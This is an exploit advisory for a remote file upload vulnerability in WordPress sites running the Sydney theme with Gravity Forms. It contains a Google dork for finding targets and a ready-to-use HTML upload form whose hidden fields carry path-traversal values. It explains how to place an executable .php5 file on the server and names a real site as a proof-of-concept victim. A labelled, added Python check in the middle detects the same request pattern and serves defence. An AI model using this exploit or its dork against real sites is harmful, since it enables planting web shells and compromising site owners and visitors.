
WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability

Author: KingSkrupellos , Published: 09-10-2018

# Exploit Title : WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Vendor Homepages : athemes.com/theme/sydney/ ~ gravityforms.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ~ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]

#################################################################################################

# Google Dork : intext:''Proudly powered by WordPress | Theme: Sydney by aThemes.''

# Exploit HTML Code :

<title>WordPress Theme Sydney by aThemes GravityForms Exploiter</title>

<form action="http://www.TARGETSITE/?gf_page=upload" method="post" enctype="multipart/form-data">

<body background=" ">

<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type="hidden">
<input name="name" value="kingskrupellos.html" type="hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">

</form>


Exploit : TARGET/?gf_page=upload

We cannot upload directly with this exploit, but we can upload our file to the site with the remote file exploiter.

# Error : {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}


# Error [ Successful ] : {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}


# Allowed File Extensions : .html .htm .php5 .txt .jpg .gif .png .html.fla .phtml .pdf

# You don't need to rename your file to _input__kingskrupellos.php5.

# Just choose a file from your machine and upload it with one of the aforementioned extensions.

# For example : a yourfilename.php file will be uploaded to the server [ site ] as /_input__kingskrupellos.php5
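
Added example (not part of the original advisory and not Gravity Forms code): a defensive check over the already-parsed fields of a POST to ?gf_page=upload that flags the traversal values and risky extensions shown above. It assumes legitimate form_id values are numeric and gform_unique_id values are alphanumeric; the function name and the sample requests are hypothetical.

```python
import re

# Extensions a PHP/Apache host may execute or serve as active content.
# .php5 .phtml .html .htm come from the advisory's allowed list; .php is added.
RISKY_EXT = {".php5", ".phtml", ".html", ".htm", ".php"}
# "..", either slash style, or a NUL byte has no place in these fields.
TRAVERSAL = re.compile(r"\.\.|[/\\\x00]")


def audit_upload_fields(fields):
    """Return a list of findings for one parsed ?gf_page=upload POST body."""
    findings = []
    # Assumption: a legitimate form_id is a plain integer.
    if not re.fullmatch(r"[0-9]+", fields.get("form_id", "")):
        findings.append("form_id is not numeric")
    # Assumption: a legitimate gform_unique_id is purely alphanumeric.
    if not re.fullmatch(r"[A-Za-z0-9]+", fields.get("gform_unique_id", "")):
        findings.append("gform_unique_id is not alphanumeric")
    for key in ("form_id", "gform_unique_id", "name"):
        if TRAVERSAL.search(fields.get(key, "")):
            findings.append(f"{key} contains path traversal characters")
    # Inspect every dotted suffix so double extensions (x.html.fla) are caught.
    parts = fields.get("name", "").lower().split(".")[1:]
    risky = sorted({"." + p for p in parts} & RISKY_EXT)
    if risky:
        findings.append("name carries executable extension " + ",".join(risky))
    return findings


# Constructed samples: the first mirrors the hidden fields of the form above,
# the second is a benign upload with made-up values.
ADVISORY_REQUEST = {"form_id": "../../../", "name": "kingskrupellos.html",
                    "gform_unique_id": "../../", "field_id": ""}
BENIGN_REQUEST = {"form_id": "3", "name": "resume.pdf",
                  "gform_unique_id": "5b1a9f0c2d7e4", "field_id": "7"}

if __name__ == "__main__":
    for label, req in (("advisory", ADVISORY_REQUEST),
                       ("benign", BENIGN_REQUEST)):
        print(label, audit_upload_fields(req) or "clean")
```

The same checks can be used to reject a request before it reaches the upload handler or to triage captured request bodies after the fact.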

# Example Usage for Windows :

# Use with XAMPP Control Panel and your Localhost.
# Use from htdocs folder located in XAMPP

# 127.0.0.1/athemeswordpressexploiter.html

# Path : TARGET/_input__kingskrupellos.php5


#################################################################################################

# Example Site => miplantestclub.com => [ Proof of Concept ] => archive.is/APl6J [ Error ] => archive.is/7G0Jq [ Successful ]

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
